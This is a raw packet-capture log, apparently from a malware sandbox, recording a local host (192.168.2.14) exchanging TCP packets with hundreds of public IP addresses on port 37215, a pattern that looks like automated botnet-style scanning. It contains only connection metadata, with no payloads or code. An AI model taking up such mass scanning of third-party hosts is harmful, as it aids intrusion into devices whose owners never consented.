                                            Jun 14, 2024 10:43:35.689344883 CEST661137215192.168.2.1441.90.65.244
                                            Jun 14, 2024 10:43:35.689347982 CEST661137215192.168.2.14156.85.17.57
                                            Jun 14, 2024 10:43:35.689348936 CEST661137215192.168.2.14156.28.82.191
                                            Jun 14, 2024 10:43:35.689348936 CEST661137215192.168.2.14197.113.37.53
                                            Jun 14, 2024 10:43:35.689359903 CEST661137215192.168.2.14156.106.88.214
                                            Jun 14, 2024 10:43:35.689361095 CEST661137215192.168.2.14156.222.236.72
                                            Jun 14, 2024 10:43:35.689359903 CEST661137215192.168.2.14156.125.27.234
                                            Jun 14, 2024 10:43:35.689361095 CEST661137215192.168.2.14156.202.206.182
                                            Jun 14, 2024 10:43:35.689371109 CEST661137215192.168.2.1441.160.131.122
                                            Jun 14, 2024 10:43:35.689372063 CEST661137215192.168.2.14197.239.116.59
                                            Jun 14, 2024 10:43:35.689372063 CEST661137215192.168.2.1441.67.22.20
                                            Jun 14, 2024 10:43:35.689372063 CEST661137215192.168.2.14197.79.36.98
                                            Jun 14, 2024 10:43:35.689398050 CEST661137215192.168.2.1441.100.116.144
                                            Jun 14, 2024 10:43:35.689399958 CEST661137215192.168.2.14197.175.137.231
                                            Jun 14, 2024 10:43:35.689399958 CEST661137215192.168.2.14156.33.122.105
                                            Jun 14, 2024 10:43:35.689402103 CEST661137215192.168.2.14156.65.112.20
                                            Jun 14, 2024 10:43:35.689403057 CEST661137215192.168.2.14197.170.252.205
                                            Jun 14, 2024 10:43:35.689407110 CEST661137215192.168.2.1441.4.30.165
                                            Jun 14, 2024 10:43:35.689407110 CEST661137215192.168.2.1441.133.233.14
                                            Jun 14, 2024 10:43:35.689415932 CEST661137215192.168.2.14156.31.135.207
                                            Jun 14, 2024 10:43:35.689415932 CEST661137215192.168.2.1441.99.95.24
                                            Jun 14, 2024 10:43:35.689419031 CEST661137215192.168.2.14156.88.226.133
                                            Jun 14, 2024 10:43:35.689423084 CEST661137215192.168.2.14156.86.252.128
                                            Jun 14, 2024 10:43:35.689431906 CEST661137215192.168.2.14156.224.159.111
                                            Jun 14, 2024 10:43:35.689434052 CEST661137215192.168.2.1441.213.212.237
                                            Jun 14, 2024 10:43:35.689439058 CEST661137215192.168.2.14156.202.150.224
                                            Jun 14, 2024 10:43:35.689441919 CEST661137215192.168.2.14156.3.188.252
                                            Jun 14, 2024 10:43:35.689443111 CEST661137215192.168.2.1441.198.119.197
                                            Jun 14, 2024 10:43:35.689446926 CEST661137215192.168.2.14197.97.24.26
                                            Jun 14, 2024 10:43:35.689455986 CEST661137215192.168.2.14156.208.48.118
                                            Jun 14, 2024 10:43:35.689455986 CEST661137215192.168.2.14197.199.250.147
                                            Jun 14, 2024 10:43:35.689456940 CEST661137215192.168.2.14156.179.133.0
                                            Jun 14, 2024 10:43:35.689457893 CEST661137215192.168.2.14197.112.147.232
                                            Jun 14, 2024 10:43:35.724440098 CEST372156611197.253.193.58192.168.2.14
                                            Jun 14, 2024 10:43:35.724450111 CEST37215661141.67.94.127192.168.2.14
                                            Jun 14, 2024 10:43:35.724458933 CEST372156611197.235.203.125192.168.2.14
                                            Jun 14, 2024 10:43:35.724467993 CEST372156611197.23.121.148192.168.2.14
                                            Jun 14, 2024 10:43:35.724478006 CEST372156611197.168.250.8192.168.2.14
                                            Jun 14, 2024 10:43:35.724493027 CEST372156611156.32.16.165192.168.2.14
                                            Jun 14, 2024 10:43:35.724502087 CEST37215661141.248.249.197192.168.2.14
                                            Jun 14, 2024 10:43:35.724510908 CEST661137215192.168.2.14197.253.193.58
                                            Jun 14, 2024 10:43:35.724519968 CEST372156611197.218.110.112192.168.2.14
                                            Jun 14, 2024 10:43:35.724519968 CEST661137215192.168.2.14197.168.250.8
                                            Jun 14, 2024 10:43:35.724520922 CEST661137215192.168.2.1441.67.94.127
                                            Jun 14, 2024 10:43:35.724524021 CEST661137215192.168.2.14197.235.203.125
                                            Jun 14, 2024 10:43:35.724529982 CEST372156611197.99.180.169192.168.2.14
                                            Jun 14, 2024 10:43:35.724530935 CEST661137215192.168.2.14197.23.121.148
                                            Jun 14, 2024 10:43:35.724536896 CEST661137215192.168.2.14156.32.16.165
                                            Jun 14, 2024 10:43:35.724539995 CEST372156611156.251.224.110192.168.2.14
                                            Jun 14, 2024 10:43:35.724539995 CEST661137215192.168.2.1441.248.249.197
                                            Jun 14, 2024 10:43:35.724549055 CEST372156611156.41.125.115192.168.2.14
                                            Jun 14, 2024 10:43:35.724556923 CEST661137215192.168.2.14197.218.110.112
                                            Jun 14, 2024 10:43:35.724558115 CEST372156611156.248.26.132192.168.2.14
                                            Jun 14, 2024 10:43:35.724564075 CEST661137215192.168.2.14197.99.180.169
                                            Jun 14, 2024 10:43:35.724565983 CEST372156611156.255.160.13192.168.2.14
                                            Jun 14, 2024 10:43:35.724570036 CEST661137215192.168.2.14156.251.224.110
                                            Jun 14, 2024 10:43:35.724574089 CEST372156611197.54.76.33192.168.2.14
                                            Jun 14, 2024 10:43:35.724582911 CEST37215661141.43.246.92192.168.2.14
                                            Jun 14, 2024 10:43:35.724584103 CEST661137215192.168.2.14156.248.26.132
                                            Jun 14, 2024 10:43:35.724585056 CEST661137215192.168.2.14156.41.125.115
                                            Jun 14, 2024 10:43:35.724591017 CEST372156611197.78.104.164192.168.2.14
                                            Jun 14, 2024 10:43:35.724591970 CEST661137215192.168.2.14156.255.160.13
                                            Jun 14, 2024 10:43:35.724600077 CEST661137215192.168.2.14197.54.76.33
                                            Jun 14, 2024 10:43:35.724608898 CEST661137215192.168.2.1441.43.246.92
                                            Jun 14, 2024 10:43:35.724612951 CEST661137215192.168.2.14197.78.104.164
                                            Jun 14, 2024 10:43:35.724662066 CEST372156611197.180.166.46192.168.2.14
                                            Jun 14, 2024 10:43:35.724669933 CEST372156611156.167.152.186192.168.2.14
                                            Jun 14, 2024 10:43:35.724678040 CEST37215661141.13.20.24192.168.2.14
                                            Jun 14, 2024 10:43:35.724685907 CEST37215661141.122.52.32192.168.2.14
                                            Jun 14, 2024 10:43:35.724694014 CEST372156611197.194.242.40192.168.2.14
                                            Jun 14, 2024 10:43:35.724699020 CEST661137215192.168.2.14156.167.152.186
                                            Jun 14, 2024 10:43:35.724699020 CEST661137215192.168.2.14197.180.166.46
                                            Jun 14, 2024 10:43:35.724701881 CEST372156611197.176.156.206192.168.2.14
                                            Jun 14, 2024 10:43:35.724709034 CEST661137215192.168.2.14197.194.242.40
                                            Jun 14, 2024 10:43:35.724709034 CEST661137215192.168.2.1441.13.20.24
                                            Jun 14, 2024 10:43:35.724709988 CEST661137215192.168.2.1441.122.52.32
                                            Jun 14, 2024 10:43:35.724710941 CEST372156611156.194.247.78192.168.2.14
                                            Jun 14, 2024 10:43:35.724720955 CEST372156611197.60.130.53192.168.2.14
                                            Jun 14, 2024 10:43:35.724729061 CEST372156611197.84.85.34192.168.2.14
                                            Jun 14, 2024 10:43:35.724735022 CEST661137215192.168.2.14156.194.247.78
                                            Jun 14, 2024 10:43:35.724735975 CEST661137215192.168.2.14197.176.156.206
                                            Jun 14, 2024 10:43:35.724737883 CEST372156611197.12.116.6192.168.2.14
                                            Jun 14, 2024 10:43:35.724746943 CEST661137215192.168.2.14197.60.130.53
                                            Jun 14, 2024 10:43:35.724750996 CEST661137215192.168.2.14197.84.85.34
                                            Jun 14, 2024 10:43:35.724778891 CEST661137215192.168.2.14197.12.116.6
                                            Jun 14, 2024 10:43:35.724987984 CEST372156611197.240.208.72192.168.2.14
                                            Jun 14, 2024 10:43:35.724997044 CEST372156611197.44.112.156192.168.2.14
                                            Jun 14, 2024 10:43:35.725006104 CEST37215661141.129.100.45192.168.2.14
                                            Jun 14, 2024 10:43:35.725016117 CEST372156611197.50.229.224192.168.2.14
                                            Jun 14, 2024 10:43:35.725022078 CEST661137215192.168.2.14197.240.208.72
                                            Jun 14, 2024 10:43:35.725027084 CEST661137215192.168.2.14197.44.112.156
                                            Jun 14, 2024 10:43:35.725037098 CEST661137215192.168.2.14197.50.229.224
                                            Jun 14, 2024 10:43:35.725045919 CEST661137215192.168.2.1441.129.100.45
                                            Jun 14, 2024 10:43:35.725152969 CEST372156611156.59.211.171192.168.2.14
                                            Jun 14, 2024 10:43:35.725162983 CEST372156611156.206.33.66192.168.2.14
                                            Jun 14, 2024 10:43:35.725171089 CEST372156611156.108.233.166192.168.2.14
                                            Jun 14, 2024 10:43:35.725178957 CEST37215661141.5.79.61192.168.2.14
                                            Jun 14, 2024 10:43:35.725181103 CEST661137215192.168.2.14156.59.211.171
                                            Jun 14, 2024 10:43:35.725187063 CEST37215661141.58.105.42192.168.2.14
                                            Jun 14, 2024 10:43:35.725195885 CEST372156611156.28.77.238192.168.2.14
                                            Jun 14, 2024 10:43:35.725197077 CEST661137215192.168.2.14156.108.233.166
                                            Jun 14, 2024 10:43:35.725199938 CEST661137215192.168.2.14156.206.33.66
                                            Jun 14, 2024 10:43:35.725204945 CEST37215661141.214.90.82192.168.2.14
                                            Jun 14, 2024 10:43:35.725214005 CEST372156611156.95.70.142192.168.2.14
                                            Jun 14, 2024 10:43:35.725215912 CEST661137215192.168.2.1441.5.79.61
                                            Jun 14, 2024 10:43:35.725215912 CEST661137215192.168.2.1441.58.105.42
                                            Jun 14, 2024 10:43:35.725223064 CEST37215661141.121.198.137192.168.2.14
                                            Jun 14, 2024 10:43:35.725229025 CEST661137215192.168.2.1441.214.90.82
                                            Jun 14, 2024 10:43:35.725230932 CEST661137215192.168.2.14156.28.77.238
                                            Jun 14, 2024 10:43:35.725231886 CEST372156611156.204.9.25192.168.2.14
                                            Jun 14, 2024 10:43:35.725241899 CEST372156611197.104.194.52192.168.2.14
                                            Jun 14, 2024 10:43:35.725248098 CEST661137215192.168.2.1441.121.198.137
                                            Jun 14, 2024 10:43:35.725253105 CEST661137215192.168.2.14156.204.9.25
                                            Jun 14, 2024 10:43:35.725255966 CEST661137215192.168.2.14156.95.70.142
                                            Jun 14, 2024 10:43:35.725259066 CEST372156611197.252.148.60192.168.2.14
                                            Jun 14, 2024 10:43:35.725269079 CEST372156611197.78.163.231192.168.2.14
                                            Jun 14, 2024 10:43:35.725276947 CEST372156611197.69.102.240192.168.2.14
                                            Jun 14, 2024 10:43:35.725281000 CEST661137215192.168.2.14197.104.194.52
                                            Jun 14, 2024 10:43:35.725286007 CEST372156611156.125.253.150192.168.2.14
                                            Jun 14, 2024 10:43:35.725295067 CEST372156611197.76.79.55192.168.2.14
                                            Jun 14, 2024 10:43:35.725298882 CEST661137215192.168.2.14197.78.163.231
                                            Jun 14, 2024 10:43:35.725302935 CEST37215661141.177.69.162192.168.2.14
                                            Jun 14, 2024 10:43:35.725302935 CEST661137215192.168.2.14197.252.148.60
                                            Jun 14, 2024 10:43:35.725307941 CEST661137215192.168.2.14156.125.253.150
                                            Jun 14, 2024 10:43:35.725307941 CEST661137215192.168.2.14197.69.102.240
                                            Jun 14, 2024 10:43:35.725312948 CEST372156611156.78.23.43192.168.2.14
                                            Jun 14, 2024 10:43:35.725320101 CEST661137215192.168.2.14197.76.79.55
                                            Jun 14, 2024 10:43:35.725327015 CEST37215661141.51.17.68192.168.2.14
                                            Jun 14, 2024 10:43:35.725336075 CEST37215661141.45.205.77192.168.2.14
                                            Jun 14, 2024 10:43:35.725336075 CEST661137215192.168.2.1441.177.69.162
                                            Jun 14, 2024 10:43:35.725343943 CEST372156611197.63.24.17192.168.2.14
                                            Jun 14, 2024 10:43:35.725353003 CEST37215661141.157.209.94192.168.2.14
                                            Jun 14, 2024 10:43:35.725353956 CEST661137215192.168.2.14156.78.23.43
                                            Jun 14, 2024 10:43:35.725362062 CEST372156611197.180.37.137192.168.2.14
                                            Jun 14, 2024 10:43:35.725361109 CEST661137215192.168.2.1441.51.17.68
                                            Jun 14, 2024 10:43:35.725368977 CEST661137215192.168.2.1441.45.205.77
                                            Jun 14, 2024 10:43:35.725369930 CEST661137215192.168.2.14197.63.24.17
                                            Jun 14, 2024 10:43:35.725369930 CEST37215661141.54.167.203192.168.2.14
                                            Jun 14, 2024 10:43:35.725383043 CEST661137215192.168.2.1441.157.209.94
                                            Jun 14, 2024 10:43:35.725388050 CEST661137215192.168.2.14197.180.37.137
                                            Jun 14, 2024 10:43:35.725404024 CEST661137215192.168.2.1441.54.167.203
                                            Jun 14, 2024 10:43:35.725522995 CEST372156611156.99.153.2192.168.2.14
                                            Jun 14, 2024 10:43:35.725532055 CEST37215661141.151.195.87192.168.2.14
                                            Jun 14, 2024 10:43:35.725541115 CEST37215661141.217.92.133192.168.2.14
                                            Jun 14, 2024 10:43:35.725549936 CEST37215661141.196.33.190192.168.2.14
                                            Jun 14, 2024 10:43:35.725553989 CEST661137215192.168.2.14156.99.153.2
                                            Jun 14, 2024 10:43:35.725563049 CEST661137215192.168.2.1441.151.195.87
                                            Jun 14, 2024 10:43:35.725564957 CEST372156611197.221.214.189192.168.2.14
                                            Jun 14, 2024 10:43:35.725569010 CEST661137215192.168.2.1441.217.92.133
                                            Jun 14, 2024 10:43:35.725574970 CEST372156611197.208.206.179192.168.2.14
                                            Jun 14, 2024 10:43:35.725578070 CEST661137215192.168.2.1441.196.33.190
                                            Jun 14, 2024 10:43:35.725584030 CEST372156611156.14.144.175192.168.2.14
                                            Jun 14, 2024 10:43:35.725591898 CEST37215661141.34.13.214192.168.2.14
                                            Jun 14, 2024 10:43:35.725596905 CEST661137215192.168.2.14197.221.214.189
                                            Jun 14, 2024 10:43:35.725600004 CEST372156611156.82.229.143192.168.2.14
                                            Jun 14, 2024 10:43:35.725605965 CEST661137215192.168.2.14197.208.206.179
                                            Jun 14, 2024 10:43:35.725608110 CEST372156611156.249.224.225192.168.2.14
                                            Jun 14, 2024 10:43:35.725615025 CEST37215661141.218.186.212192.168.2.14
                                            Jun 14, 2024 10:43:35.725615978 CEST661137215192.168.2.14156.14.144.175
                                            Jun 14, 2024 10:43:35.725619078 CEST661137215192.168.2.1441.34.13.214
                                            Jun 14, 2024 10:43:35.725622892 CEST37215661141.233.143.12192.168.2.14
                                            Jun 14, 2024 10:43:35.725631952 CEST37215661141.7.73.158192.168.2.14
                                            Jun 14, 2024 10:43:35.725639105 CEST372156611156.31.90.73192.168.2.14
                                            Jun 14, 2024 10:43:35.725641012 CEST661137215192.168.2.1441.218.186.212
                                            Jun 14, 2024 10:43:35.725644112 CEST661137215192.168.2.14156.249.224.225
                                            Jun 14, 2024 10:43:35.725644112 CEST661137215192.168.2.14156.82.229.143
                                            Jun 14, 2024 10:43:35.725647926 CEST37215661141.108.241.16192.168.2.14
                                            Jun 14, 2024 10:43:35.725652933 CEST661137215192.168.2.1441.233.143.12
                                            Jun 14, 2024 10:43:35.725656986 CEST37215661141.155.196.190192.168.2.14
                                            Jun 14, 2024 10:43:35.725657940 CEST661137215192.168.2.1441.7.73.158
                                            Jun 14, 2024 10:43:35.725661039 CEST661137215192.168.2.14156.31.90.73
                                            Jun 14, 2024 10:43:35.725665092 CEST372156611156.163.57.134192.168.2.14
                                            Jun 14, 2024 10:43:35.725672960 CEST372156611156.247.6.235192.168.2.14
                                            Jun 14, 2024 10:43:35.725681067 CEST372156611197.81.245.28192.168.2.14
                                            Jun 14, 2024 10:43:35.725686073 CEST661137215192.168.2.14156.163.57.134
                                            Jun 14, 2024 10:43:35.725687027 CEST661137215192.168.2.1441.155.196.190
                                            Jun 14, 2024 10:43:35.725691080 CEST372156611156.117.76.121192.168.2.14
                                            Jun 14, 2024 10:43:35.725693941 CEST661137215192.168.2.1441.108.241.16
                                            Jun 14, 2024 10:43:35.725699902 CEST372156611156.178.144.38192.168.2.14
                                            Jun 14, 2024 10:43:35.725704908 CEST661137215192.168.2.14197.81.245.28
                                            Jun 14, 2024 10:43:35.725706100 CEST661137215192.168.2.14156.247.6.235
                                            Jun 14, 2024 10:43:35.725709915 CEST372156611197.19.81.151192.168.2.14
                                            Jun 14, 2024 10:43:35.725716114 CEST661137215192.168.2.14156.117.76.121
                                            Jun 14, 2024 10:43:35.725719929 CEST372156611156.83.22.114192.168.2.14
                                            Jun 14, 2024 10:43:35.725723982 CEST661137215192.168.2.14156.178.144.38
                                            Jun 14, 2024 10:43:35.725729942 CEST372156611197.108.0.223192.168.2.14
                                            Jun 14, 2024 10:43:35.725734949 CEST661137215192.168.2.14197.19.81.151
                                            Jun 14, 2024 10:43:35.725738049 CEST37215661141.235.16.172192.168.2.14
                                            Jun 14, 2024 10:43:35.725748062 CEST37215661141.118.245.14192.168.2.14
                                            Jun 14, 2024 10:43:35.725748062 CEST661137215192.168.2.14197.108.0.223
                                            Jun 14, 2024 10:43:35.725754023 CEST661137215192.168.2.14156.83.22.114
                                            Jun 14, 2024 10:43:35.725755930 CEST372156611197.94.195.84192.168.2.14
                                            Jun 14, 2024 10:43:35.725776911 CEST661137215192.168.2.1441.118.245.14
                                            Jun 14, 2024 10:43:35.725775957 CEST661137215192.168.2.1441.235.16.172
                                            Jun 14, 2024 10:43:35.725780010 CEST661137215192.168.2.14197.94.195.84
                                            Jun 14, 2024 10:43:35.725954056 CEST37215661141.247.182.165192.168.2.14
                                            Jun 14, 2024 10:43:35.725963116 CEST372156611156.236.153.67192.168.2.14
                                            Jun 14, 2024 10:43:35.725970030 CEST37215661141.71.86.236192.168.2.14
                                            Jun 14, 2024 10:43:35.725977898 CEST372156611197.155.155.170192.168.2.14
                                            Jun 14, 2024 10:43:35.725986004 CEST37215661141.225.231.84192.168.2.14
                                            Jun 14, 2024 10:43:35.725986958 CEST661137215192.168.2.1441.247.182.165
                                            Jun 14, 2024 10:43:35.725995064 CEST372156611156.57.82.86192.168.2.14
                                            Jun 14, 2024 10:43:35.725996017 CEST661137215192.168.2.14156.236.153.67
                                            Jun 14, 2024 10:43:35.726001024 CEST661137215192.168.2.1441.71.86.236
                                            Jun 14, 2024 10:43:35.726002932 CEST372156611197.144.225.45192.168.2.14
                                            Jun 14, 2024 10:43:35.726011992 CEST37215661141.107.169.248192.168.2.14
                                            Jun 14, 2024 10:43:35.726016998 CEST661137215192.168.2.1441.225.231.84
                                            Jun 14, 2024 10:43:35.726017952 CEST661137215192.168.2.14197.155.155.170
                                            Jun 14, 2024 10:43:35.726017952 CEST661137215192.168.2.14156.57.82.86
                                            Jun 14, 2024 10:43:35.726020098 CEST37215661141.147.3.74192.168.2.14
                                            Jun 14, 2024 10:43:35.726027966 CEST661137215192.168.2.14197.144.225.45
                                            Jun 14, 2024 10:43:35.726047039 CEST372156611156.62.249.174192.168.2.14
                                            Jun 14, 2024 10:43:35.726048946 CEST661137215192.168.2.1441.107.169.248
                                            Jun 14, 2024 10:43:35.726048946 CEST661137215192.168.2.1441.147.3.74
                                            Jun 14, 2024 10:43:35.726054907 CEST372156611197.45.160.57192.168.2.14
                                            Jun 14, 2024 10:43:35.726059914 CEST37215661141.146.47.30192.168.2.14
                                            Jun 14, 2024 10:43:35.726063967 CEST37215661141.158.221.77192.168.2.14
                                            Jun 14, 2024 10:43:35.726067066 CEST37215661141.180.194.12192.168.2.14
                                            Jun 14, 2024 10:43:35.726074934 CEST372156611197.25.104.255192.168.2.14
                                            Jun 14, 2024 10:43:35.726083040 CEST37215661141.144.155.123192.168.2.14
                                            Jun 14, 2024 10:43:35.726088047 CEST661137215192.168.2.14156.62.249.174
                                            Jun 14, 2024 10:43:35.726089954 CEST661137215192.168.2.1441.158.221.77
                                            Jun 14, 2024 10:43:35.726090908 CEST37215661141.153.60.230192.168.2.14
                                            Jun 14, 2024 10:43:35.726098061 CEST661137215192.168.2.14197.45.160.57
                                            Jun 14, 2024 10:43:35.726099014 CEST372156611197.63.45.83192.168.2.14
                                            Jun 14, 2024 10:43:35.726099968 CEST661137215192.168.2.14197.25.104.255
                                            Jun 14, 2024 10:43:35.726104021 CEST661137215192.168.2.1441.180.194.12
                                            Jun 14, 2024 10:43:35.726106882 CEST661137215192.168.2.1441.146.47.30
                                            Jun 14, 2024 10:43:35.726108074 CEST372156611197.211.33.33192.168.2.14
                                            Jun 14, 2024 10:43:35.726119041 CEST661137215192.168.2.1441.153.60.230
                                            Jun 14, 2024 10:43:35.726120949 CEST661137215192.168.2.14197.63.45.83
                                            Jun 14, 2024 10:43:35.726125956 CEST372156611156.83.121.141192.168.2.14
                                            Jun 14, 2024 10:43:35.726131916 CEST661137215192.168.2.1441.144.155.123
                                            Jun 14, 2024 10:43:35.726134062 CEST372156611156.206.126.195192.168.2.14
                                            Jun 14, 2024 10:43:35.726142883 CEST37215661141.203.157.254192.168.2.14
                                            Jun 14, 2024 10:43:35.726146936 CEST661137215192.168.2.14156.83.121.141
                                            Jun 14, 2024 10:43:35.726150990 CEST372156611197.107.203.197192.168.2.14
                                            Jun 14, 2024 10:43:35.726152897 CEST661137215192.168.2.14197.211.33.33
                                            Jun 14, 2024 10:43:35.726159096 CEST372156611156.121.211.4192.168.2.14
                                            Jun 14, 2024 10:43:35.726164103 CEST661137215192.168.2.14156.206.126.195
                                            Jun 14, 2024 10:43:35.726166010 CEST372156611156.195.211.251192.168.2.14
                                            Jun 14, 2024 10:43:35.726170063 CEST661137215192.168.2.1441.203.157.254
                                            Jun 14, 2024 10:43:35.726175070 CEST372156611197.45.22.82192.168.2.14
                                            Jun 14, 2024 10:43:35.726182938 CEST372156611156.218.27.154192.168.2.14
                                            Jun 14, 2024 10:43:35.726188898 CEST661137215192.168.2.14197.107.203.197
                                            Jun 14, 2024 10:43:35.726192951 CEST37215661141.86.162.204192.168.2.14
                                            Jun 14, 2024 10:43:35.726191998 CEST661137215192.168.2.14156.121.211.4
                                            Jun 14, 2024 10:43:35.726195097 CEST661137215192.168.2.14156.195.211.251
                                            Jun 14, 2024 10:43:35.726202011 CEST372156611156.13.229.147192.168.2.14
                                            Jun 14, 2024 10:43:35.726203918 CEST661137215192.168.2.14197.45.22.82
                                            Jun 14, 2024 10:43:35.726221085 CEST661137215192.168.2.1441.86.162.204
                                            Jun 14, 2024 10:43:35.726222992 CEST661137215192.168.2.14156.13.229.147
                                            Jun 14, 2024 10:43:35.726224899 CEST661137215192.168.2.14156.218.27.154
                                            Jun 14, 2024 10:43:35.726289988 CEST372156611156.175.5.233192.168.2.14
                                            Jun 14, 2024 10:43:35.726298094 CEST372156611156.163.195.105192.168.2.14
                                            Jun 14, 2024 10:43:35.726303101 CEST372156611197.12.153.202192.168.2.14
                                            Jun 14, 2024 10:43:35.726320028 CEST372156611197.239.56.251192.168.2.14
                                            Jun 14, 2024 10:43:35.726329088 CEST372156611156.152.18.16192.168.2.14
                                            Jun 14, 2024 10:43:35.726337910 CEST372156611156.244.195.251192.168.2.14
                                            Jun 14, 2024 10:43:35.726346970 CEST372156611197.28.139.22192.168.2.14
                                            Jun 14, 2024 10:43:35.726353884 CEST372156611156.211.60.159192.168.2.14
                                            Jun 14, 2024 10:43:35.726366043 CEST661137215192.168.2.14156.152.18.16
                                            Jun 14, 2024 10:43:35.726366043 CEST661137215192.168.2.14156.244.195.251
                                            Jun 14, 2024 10:43:35.726376057 CEST661137215192.168.2.14156.163.195.105
                                            Jun 14, 2024 10:43:35.726382971 CEST661137215192.168.2.14156.175.5.233
                                            Jun 14, 2024 10:43:35.726387978 CEST661137215192.168.2.14197.12.153.202
                                            Jun 14, 2024 10:43:35.726397038 CEST661137215192.168.2.14197.28.139.22
                                            Jun 14, 2024 10:43:35.726403952 CEST661137215192.168.2.14197.239.56.251
                                            Jun 14, 2024 10:43:35.726421118 CEST661137215192.168.2.14156.211.60.159
                                            Jun 14, 2024 10:43:35.726484060 CEST372156611197.138.17.253192.168.2.14
                                            Jun 14, 2024 10:43:35.726499081 CEST372156611197.200.116.255192.168.2.14
                                            Jun 14, 2024 10:43:35.726506948 CEST37215661141.64.196.190192.168.2.14
                                            Jun 14, 2024 10:43:35.726516008 CEST372156611156.234.43.13192.168.2.14
                                            Jun 14, 2024 10:43:35.726524115 CEST37215661141.3.97.244192.168.2.14
                                            Jun 14, 2024 10:43:35.726533890 CEST372156611197.78.103.253192.168.2.14
                                            Jun 14, 2024 10:43:35.726537943 CEST661137215192.168.2.14156.234.43.13
                                            Jun 14, 2024 10:43:35.726540089 CEST661137215192.168.2.14197.200.116.255
                                            Jun 14, 2024 10:43:35.726540089 CEST661137215192.168.2.1441.64.196.190
                                            Jun 14, 2024 10:43:35.726542950 CEST372156611197.32.65.176192.168.2.14
                                            Jun 14, 2024 10:43:35.726552010 CEST372156611156.128.113.32192.168.2.14
                                            Jun 14, 2024 10:43:35.726555109 CEST661137215192.168.2.14197.138.17.253
                                            Jun 14, 2024 10:43:35.726560116 CEST372156611156.85.17.57192.168.2.14
                                            Jun 14, 2024 10:43:35.726568937 CEST372156611197.175.205.228192.168.2.14
                                            Jun 14, 2024 10:43:35.726577044 CEST37215661141.90.65.244192.168.2.14
                                            Jun 14, 2024 10:43:35.726582050 CEST661137215192.168.2.1441.3.97.244
                                            Jun 14, 2024 10:43:35.726584911 CEST661137215192.168.2.14197.78.103.253
                                            Jun 14, 2024 10:43:35.726587057 CEST372156611156.28.82.191192.168.2.14
                                            Jun 14, 2024 10:43:35.726587057 CEST661137215192.168.2.14156.85.17.57
                                            Jun 14, 2024 10:43:35.726594925 CEST372156611197.113.37.53192.168.2.14
                                            Jun 14, 2024 10:43:35.726603985 CEST37215661141.160.131.122192.168.2.14
                                            Jun 14, 2024 10:43:35.726612091 CEST372156611156.222.236.72192.168.2.14
                                            Jun 14, 2024 10:43:35.726614952 CEST661137215192.168.2.1441.90.65.244
                                            Jun 14, 2024 10:43:35.726619959 CEST37215661141.67.22.20192.168.2.14
                                            Jun 14, 2024 10:43:35.726628065 CEST372156611197.239.116.59192.168.2.14
                                            Jun 14, 2024 10:43:35.726629019 CEST661137215192.168.2.14197.175.205.228
                                            Jun 14, 2024 10:43:35.726628065 CEST661137215192.168.2.14197.32.65.176
                                            Jun 14, 2024 10:43:35.726628065 CEST661137215192.168.2.14156.128.113.32
                                            Jun 14, 2024 10:43:35.726632118 CEST661137215192.168.2.1441.160.131.122
                                            Jun 14, 2024 10:43:35.726636887 CEST372156611156.106.88.214192.168.2.14
                                            Jun 14, 2024 10:43:35.726635933 CEST661137215192.168.2.14156.28.82.191
                                            Jun 14, 2024 10:43:35.726636887 CEST661137215192.168.2.14197.113.37.53
                                            Jun 14, 2024 10:43:35.726644993 CEST372156611156.202.206.182192.168.2.14
                                            Jun 14, 2024 10:43:35.726653099 CEST661137215192.168.2.1441.67.22.20
                                            Jun 14, 2024 10:43:35.726654053 CEST372156611156.125.27.234192.168.2.14
                                            Jun 14, 2024 10:43:35.726655960 CEST661137215192.168.2.14156.222.236.72
                                            Jun 14, 2024 10:43:35.726665020 CEST661137215192.168.2.14197.239.116.59
                                            Jun 14, 2024 10:43:35.726675034 CEST661137215192.168.2.14156.106.88.214
                                            Jun 14, 2024 10:43:35.726677895 CEST661137215192.168.2.14156.202.206.182
                                            Jun 14, 2024 10:43:35.726692915 CEST661137215192.168.2.14156.125.27.234
                                            Jun 14, 2024 10:43:35.726720095 CEST372156611197.79.36.98192.168.2.14
                                            Jun 14, 2024 10:43:35.726730108 CEST372156611197.175.137.231192.168.2.14
                                            Jun 14, 2024 10:43:35.726737976 CEST372156611197.170.252.205192.168.2.14
                                            Jun 14, 2024 10:43:35.726746082 CEST37215661141.100.116.144192.168.2.14
                                            Jun 14, 2024 10:43:35.726753950 CEST372156611156.65.112.20192.168.2.14
                                            Jun 14, 2024 10:43:35.726758003 CEST661137215192.168.2.14197.79.36.98
                                            Jun 14, 2024 10:43:35.726758003 CEST661137215192.168.2.14197.175.137.231
                                            Jun 14, 2024 10:43:35.726759911 CEST661137215192.168.2.14197.170.252.205
                                            Jun 14, 2024 10:43:35.726763010 CEST372156611156.33.122.105192.168.2.14
                                            Jun 14, 2024 10:43:35.726773024 CEST372156611156.31.135.207192.168.2.14
                                            Jun 14, 2024 10:43:35.726780891 CEST372156611156.88.226.133192.168.2.14
                                            Jun 14, 2024 10:43:35.726784945 CEST661137215192.168.2.14156.65.112.20
                                            Jun 14, 2024 10:43:35.726787090 CEST661137215192.168.2.1441.100.116.144
                                            Jun 14, 2024 10:43:35.726788998 CEST37215661141.4.30.165192.168.2.14
                                            Jun 14, 2024 10:43:35.726794004 CEST661137215192.168.2.14156.33.122.105
                                            Jun 14, 2024 10:43:35.726794004 CEST661137215192.168.2.14156.31.135.207
                                            Jun 14, 2024 10:43:35.726799011 CEST372156611156.86.252.128192.168.2.14
                                            Jun 14, 2024 10:43:35.726808071 CEST37215661141.99.95.24192.168.2.14
                                            Jun 14, 2024 10:43:35.726807117 CEST661137215192.168.2.14156.88.226.133
                                            Jun 14, 2024 10:43:35.726814985 CEST37215661141.133.233.14192.168.2.14
                                            Jun 14, 2024 10:43:35.726823092 CEST372156611156.224.159.111192.168.2.14
                                            Jun 14, 2024 10:43:35.726829052 CEST661137215192.168.2.14156.86.252.128
                                            Jun 14, 2024 10:43:35.726830959 CEST37215661141.213.212.237192.168.2.14
                                            Jun 14, 2024 10:43:35.726839066 CEST661137215192.168.2.1441.99.95.24
                                            Jun 14, 2024 10:43:35.726839066 CEST372156611156.3.188.252192.168.2.14
                                            Jun 14, 2024 10:43:35.726835012 CEST661137215192.168.2.1441.4.30.165
                                            Jun 14, 2024 10:43:35.726847887 CEST372156611156.202.150.224192.168.2.14
                                            Jun 14, 2024 10:43:35.726855993 CEST661137215192.168.2.1441.213.212.237
                                            Jun 14, 2024 10:43:35.726855993 CEST661137215192.168.2.1441.133.233.14
                                            Jun 14, 2024 10:43:35.726855993 CEST372156611197.97.24.26192.168.2.14
                                            Jun 14, 2024 10:43:35.726857901 CEST661137215192.168.2.14156.224.159.111
